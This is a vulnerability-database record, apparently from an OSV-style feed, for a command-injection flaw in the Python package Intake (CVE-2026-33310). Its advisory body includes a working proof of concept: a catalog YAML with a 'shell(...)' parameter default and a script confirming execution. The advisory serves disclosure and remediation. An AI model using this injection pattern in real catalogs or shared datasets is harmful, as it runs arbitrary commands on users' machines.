{"id":"CVE-2026-33310","aliases":["GHSA-37g4-qqqv-7m99","PYSEC-2026-2185"],"title":"Intake has a Command Injection via shell() Expansion in Parameter Defaults","summary":"Intake has a Command Injection via shell() Expansion in Parameter Defaults","severity":"high","cvss":8.8,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","vendor":"intake","product":"intake","ecosystem":"pip","affected":["intake <= 2.0.9"],"published":"2026-03-19","updated":"2026-07-13","source":"OSV","sourceUrl":"https://osv.dev/vulnerability/GHSA-37g4-qqqv-7m99","references":[{"url":"https://github.com/intake/intake/security/advisories/GHSA-37g4-qqqv-7m99"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33310"},{"url":"https://github.com/intake/intake/commit/d0c0b6b57c1cb3f73880655ded4a9b0e18e1fd1b"},{"url":"https://github.com/intake/intake"}],"tags":["osv","pip","exploit-available"],"epss":0.00428,"epssPercentile":0.36695,"ingestedAt":"2026-07-13T18:57:51.705Z","exploits":{"github":1,"githubRepos":["https://github.com/redyank/CVE-2026-33310"],"checkedAt":"2026-09-23T07:13:59.287Z"},"exploitAvailable":true,"slug":"CVE-2026-33310","body":"## Overview\n\n### Summary\nThe shell() syntax within parameter default values appears to be automatically expanded during the catalog parsing process.\nIf a catalog contains a parameter default such as shell(<command>), the command may be executed when the catalog source is accessed.\nThis means that if a user loads a malicious catalog YAML, embedded commands could execute on the host system.\nThis behavior could potentially be classified as OS Command Injection / Unsafe Shell Expansion.\n\n### Details\nThe issue appears to originate from how parameter default values are expanded when a catalog source is accessed.\n\nDuring catalog loading and source access:\n\nIntake resolves parameter default values\nThe function responsible for expanding defaults processes the shell() syntax\nThe shell expression triggers a subprocess execution\nBecause this occurs during catalog evaluation, the command may execute before the user explicitly interacts with the dataset itself.\n\nAffected logic appears to involve:\n```\nexpand_defaults()\n```\nand related parameter parsing mechanisms.\n\n\n### PoC\nexploit.yaml\n```\nmetadata:\n  version: 1\nsources:\n  rce_test:\n    driver: csv\n    description: \"Testing shell expansion in parameters\"\n    args:\n      urlpath: \"{{ cmd_exec }}\"\n    parameters:\n      cmd_exec:\n        display_name: \"Test Parameter\"\n        type: str\n        default: \"shell(touch /tmp/intake_rce_test)\"\n```\n\nreproduce.py\n```\nimport intake\nimport os\n\nPROOF_FILE = \"/tmp/intake_rce_test\"\n\nif os.path.exists(PROOF_FILE):\n    os.remove(PROOF_FILE)\n\nprint(f\"[*] Proof file exists before: {os.path.exists(PROOF_FILE)}\")\n\ntry:\n    cat = intake.open_catalog(\"exploit.yaml\")\n\n    print(\"Accessing source...\")\n    _ = cat[\"rce_test\"]\n\nexcept Exception as e:\n    print(f\" Error during execution: {e}\")\n\nif os.path.exists(PROOF_FILE):\n    print(f\" Command execution confirmed, Found: {PROOF_FILE}\")\nelse:\n    print(\"Command execution did not occur.\")\n```\n### Attack Scenario\nA potential attack scenario could be:\n\n1. An attacker publishes a malicious Intake catalog YAML file\n2. The victim downloads or loads the catalog\n3. The victim accesses a source entry in the catalog\n4. Parameter defaults are expanded\n5. The shell() expression triggers execution of the embedded command\n\n### Impact\n\nIf this behavior is confirmed to be unintended, an attacker could distribute a malicious catalog file via:\n\n- Git repositories\n- shared datasets\n- URLs\n- data science workflows\n- Any user loading the catalog could unknowingly execute commands with their local user privileges.\n\n### Recommendation\nPossible mitigations could include:\n\n- disabling shell() expansion by default\n- requiring an explicit opt-in flag (e.g., allow_shell=True)\n- restricting shell execution for catalogs loaded from untrusted sources\nPlease let me know if additional information or testing is needed.\nI'm happy to assist with further analysis or validation.\n\n## Affected packages\n\n- `intake <= 2.0.9`\n\n## Remediation\n\nRefer to the advisory for the patched release.","depth":"midnight","depthScore":60,"depthScoreParts":{"impact":48.4,"likelihood":0.1,"exploitation":12,"ransomware":0},"changes":[{"seq":5105,"id":"CVE-2026-33310","ts":1788887248529,"field":"exploit_available","old":"false","new":"true"},{"seq":3988,"id":"CVE-2026-33310","ts":1788886364200,"field":"exploit_available","old":"true","new":"false"},{"seq":2803,"id":"CVE-2026-33310","ts":1788883030897,"field":"exploit_available","old":"false","new":"true"},{"seq":1832,"id":"CVE-2026-33310","ts":1788882433829,"field":"exploit_available","old":"true","new":"false"},{"seq":930,"id":"CVE-2026-33310","ts":1788881867557,"field":"exploit_available","old":"false","new":"true"}]}